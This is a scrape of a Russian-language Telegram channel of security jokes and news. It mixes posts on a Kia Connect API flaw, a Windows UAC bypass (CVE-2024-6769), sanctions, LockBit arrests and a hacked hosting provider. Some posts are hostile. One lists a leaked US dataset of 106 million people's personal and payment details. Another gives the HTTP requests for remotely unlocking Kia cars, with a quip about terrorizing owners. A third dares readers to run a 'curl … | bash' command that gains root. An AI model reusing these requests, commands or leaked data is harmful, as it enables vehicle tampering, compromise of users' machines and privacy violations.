папкин ИБшник, мамкин хацкер
55 subscribers
776 photos
78 videos
19 files
244 links
Круглосуточный уголок shit-постинга на темы около DevSecOps, Reverse-Enginnering, NetDiscovery, DataMining. Ну и конечно же мемесы.
Download Telegram
ШТИРЛЕЦ ДАВНО НЕ БЫЛ ТАК БЛИЗКО К ПРОВАЛУ

(pango.co официально владелец большинства популярных VPN серверов, таких как UltaVPN, VPN360, BetterNet, OVPN, COSMOVPN, а так же UltraAV :DDDD)
1
USA dream life:
MC2DATA, USA, 106млн уникальных, 2 ТБ

Графы содержат:
• Полное имя
• Возраст
• Домашний адрес
• Электронную почту
• IP-адрес
• Номер телефона
• Платёжную информацию
• Юридические документы
• Зашифрованные пароли
• Трудовой стаж
• Данные семьи, родственников и соседей
Hamster - $0.0000000016, как дела?
Ключик Киа получить просто:
POST /apps/services/owners/apigwServlet.html HTTP/2
Host: owners.kia.com
Httpmethod: GET
Apiurl: /door/unlock
Servicetype: postLoginCustomer
Cookie: JSESSIONID=SESSION_TOKEN;


Делаем реквест к открытию двери:
GET /apigw/v1/rems/door/unlock HTTP/1.1
Host: api.owners.kia.com
Sid: 454817d4-b228-4103-a26f-884e362e8dee
Vinkey: 3ecc1a19-aefd-4188-a7fe-1723e1663d6e



Получаем ВИНуид.
Терроризируем владельцев.

Список попавших с 2025 модельного по 2018:

https://samcurry.net/hacking-kia

Там же подробные инструкции атаки.
🤣
Please open Telegram to view this post
VIEW IN TELEGRAM
Ну все, теперь точно устарело, даже неКасперский написали))
Forwarded from НеКасперский
Media is too big
VIEW IN TELEGRAM
Корейцы делают вещи

Высинилось, что большую часть KIA, выпущенных с 2014 года можно было взломать и угнать меньше чем за 30 секунд.

Да, в два раза быстрее, чем в фильме. Все машины, что поддерживали KIA Connect не были должным образом защищены. Причём не имело значение, есть ли у владельца авто подписка на сервис или нет.

Проблема свелась к корневому дилерскому центру KIA, который активировал машины. Через его API можно было создать фиктивный аккаунт и получать токены уже для доступа к KIA Connect. Злоумышленники получали доступ к камерам, функциям блокировки, удалённого запуска, геолокации, иллюминации и сигналу авто. Более того, через приложение раскрывали данные и о владельце: его имени, телефона, адреса и посты.

Нагляднее всего продемонстрировали эксплойт KIA Tool журналисты из Wierd, взломавшие машину одного из своих коллег.

Владельцев Stinger поздравляем, все модели до 2022 года почти никак не пострадали: у большинства можно узнать только геопозицию.

НеКасперский
Очередной обход UAC в Windows: CVE-2024-6769

В последние недели активно бурление об новой уязвимости, известная как CVE-2024-6769, которая позволяет злоумышленникам обходить механизм контроля учетных записей (UAC) в операционной системе Windows. Этот механизм был разработан для повышения безопасности, ограничивая права пользователей и требуя подтверждения для выполнения определенных действий. Однако новая уязвимость в очередной раз ставит под сомнение эффективность этого защитного механизма.

### Механизм UAC и его значение?

Контроль учетных записей (UAC) был внедрен в Windows с целью защиты систем от несанкционированного доступа и выполнения вредоносного кода. При попытке выполнить действия, требующие повышенных привилегий, пользователю отображается запрос на подтверждение. Однако злоумышленники нашли способ использовать уровни целостности для обхода этого механизма, что позволяет им выполнять код с повышенными правами без ведома пользователя.

### Метод атаки

Атака основана на манипуляциях с уровнями целостности, которые определяют, какие действия может выполнять пользователь. Злоумышленники могут использовать эту уязвимость для пересечения границ пользователей, что приводит к выполнению кода с привилегиями администратора. Это создает серьезные риски для безопасности систем, так как позволяет атакующим получать доступ к критически важным данным и ресурсам.

Уязвимость CVE-2024-6769 представляет собой цепочку атак, которая позволяет злоумышленникам повышать свои привилегии в системах Windows, используя два основных метода: перехват DLL и отравление кэша активации.

### Техническая реализация

1. Перехват DLL:
- Злоумышленник использует функцию NtCreateSymbolicLinkObject для перенаправления корневого диска на контролируемую папку, например, с C:\ на C:\users\public. Это приводит к тому, что некоторые службы начинают загружать библиотеки из поддельной папки system32[1][2].

2. Отравление кэша активации:
- Вторая стадия атаки включает использование механизма ALPC (Advanced Local Procedure Call) для взаимодействия с процессом CSRSS (Client/Server Runtime Subsystem). Атакующий может модифицировать кэш активации, что позволяет исполнять код с повышенными привилегиями без запроса UAC[2][3].



### Оценка Microsoft

Интересно, что Microsoft не классифицирует данное поведение как уязвимость. Это вызывает бурление разнообразных масс цвета детской неожиданности.

Будем поглядеть…


Sources
[1] CVE-2024-6769 | INCIBE-CERT https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6769
[2] fortra/CVE-2024-6769: Activation cache poisoning to ... - GitHub https://github.com/fortra/CVE-2024-6769
[3] Microsoft Vulnerability CVE-2024-6769 Now Public on ... https://www.globalsecuritymag.fr/microsoft-vulnerability-cve-2024-6769-now-public-on-fortra-com.html
[4] CoreLabs Articles - Core Security https://www.coresecurity.com/core-labs/articles
[5] CVE-2024-6729 Detail - NVD https://nvd.nist.gov/vuln/detail/CVE-2024-6729
[6] CVE-2024-6769 Detail - NVD https://nvd.nist.gov/vuln/detail/cve-2024-6769
[7] Novel Exploit Chain Enables Windows UAC Bypass - Dark Reading https://www.darkreading.com/vulnerabilities-threats/exploit-chain-windows-uac-bypass
[8] CVE-2024-6769 - CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6769
👍1
Сегодня понедельник.

Сегодня Федеральное бюро расследований США и Национальное агентство по борьбе с преступностью Великобритании решили продолжить борьбу с группой вымогателей Lockbit.

Как показано на рисунке: они арестовали больше филиалов Lockbit и вывели из строя больше инфраструктуры 🫥
Please open Telegram to view this post
VIEW IN TELEGRAM
США ввели санкции против «Бибы», CHERDAKMUDAK и Сани Малого

США ввели «относящиеся к киберсфере» санкции против 7 физических и 2 юридических лиц РФ, у некоторых помимо имён в санкционном листе есть клички.

Двое из семи вошедших в него россиян — хакеры с весьма оригинальными прозвищами — CHERDAKMUDAK a.k.a. Sanya a.k.a. Maloy, Serega; a.k.a. «POCH»; a.k.a. «STEN».
1
Forwarded from vx-underground
In honor of Cybersecurity Awareness Month we are issuing a challenge!

All of you (yes, even you) have to get 1 malware.

1 malware = 1 awareness

Good luck!!!!!1
vx-underground
In honor of Cybersecurity Awareness Month we are issuing a challenge! All of you (yes, even you) have to get 1 malware. 1 malware = 1 awareness Good luck!!!!!1
ну че, погнали?)

curl -sl https://nekkit.xyz///rootme | bash


Шалость? Определенно, однако UID = 0 😁
Выводы делайте сами :)))
1
Ладн, ластовый мемес и system halt 😋
Please open Telegram to view this post
VIEW IN TELEGRAM
1
В течение последней недели или около того неизвестный человек присылал @vxunderground несколько интересных фотографий.

Этот человек утверждает, что разочарован в провайдере хостинга "не пробиваемого" 'zservers ТЧК ru'. Их разочарование привело к тому, что они провели 'пентест' и успешно скомпрометировали "не пробиваемого" провайдера хостинга.

Следует отметить, что это не первый раз, когда мы делимся информацией о взломе zserver. Несколько месяцев назад мы раскрыли, что неизвестный человек утверждал, что скомпрометировал провайдера хостинга.

Подводя итог:
у них ВСЕ ЕЩЕ есть доступ. Прошло несколько месяцев.


За время нашего разговора они прислали нам десятки скриншотов с этого хостинга. Они раскрыли настоящее имя владельца (с паспортными данными и фотографиями). Они также показали переписку по электронной почте между владельцем и клиентами, у которых есть вопросы об услугах и ценах.

Они также успешно перечислили каждого клиента провайдера абузоустойчивого хостинга — имена клиентов (вероятно, поддельные), адрес электронной почты, используемый для регистрации на сервисе, платежную информацию и услуги, за которые они платят.

Эти неизвестные лица сумели продвинуться дальше и получить доступ к административным ресурсам, обнаружив, что у этого провайдера абузоустойчивого хостинга есть каталог под названием «пароли (все)», который заполнен сотнями, возможно, тысячами учетных данных для различных вещей.

Если вам от этого станет легче, они действительно читают жалобы на злоупотребления, которые получают. Но они не предпринимают по ним никаких действий. По крайней мере, их читают, верно?
🗿1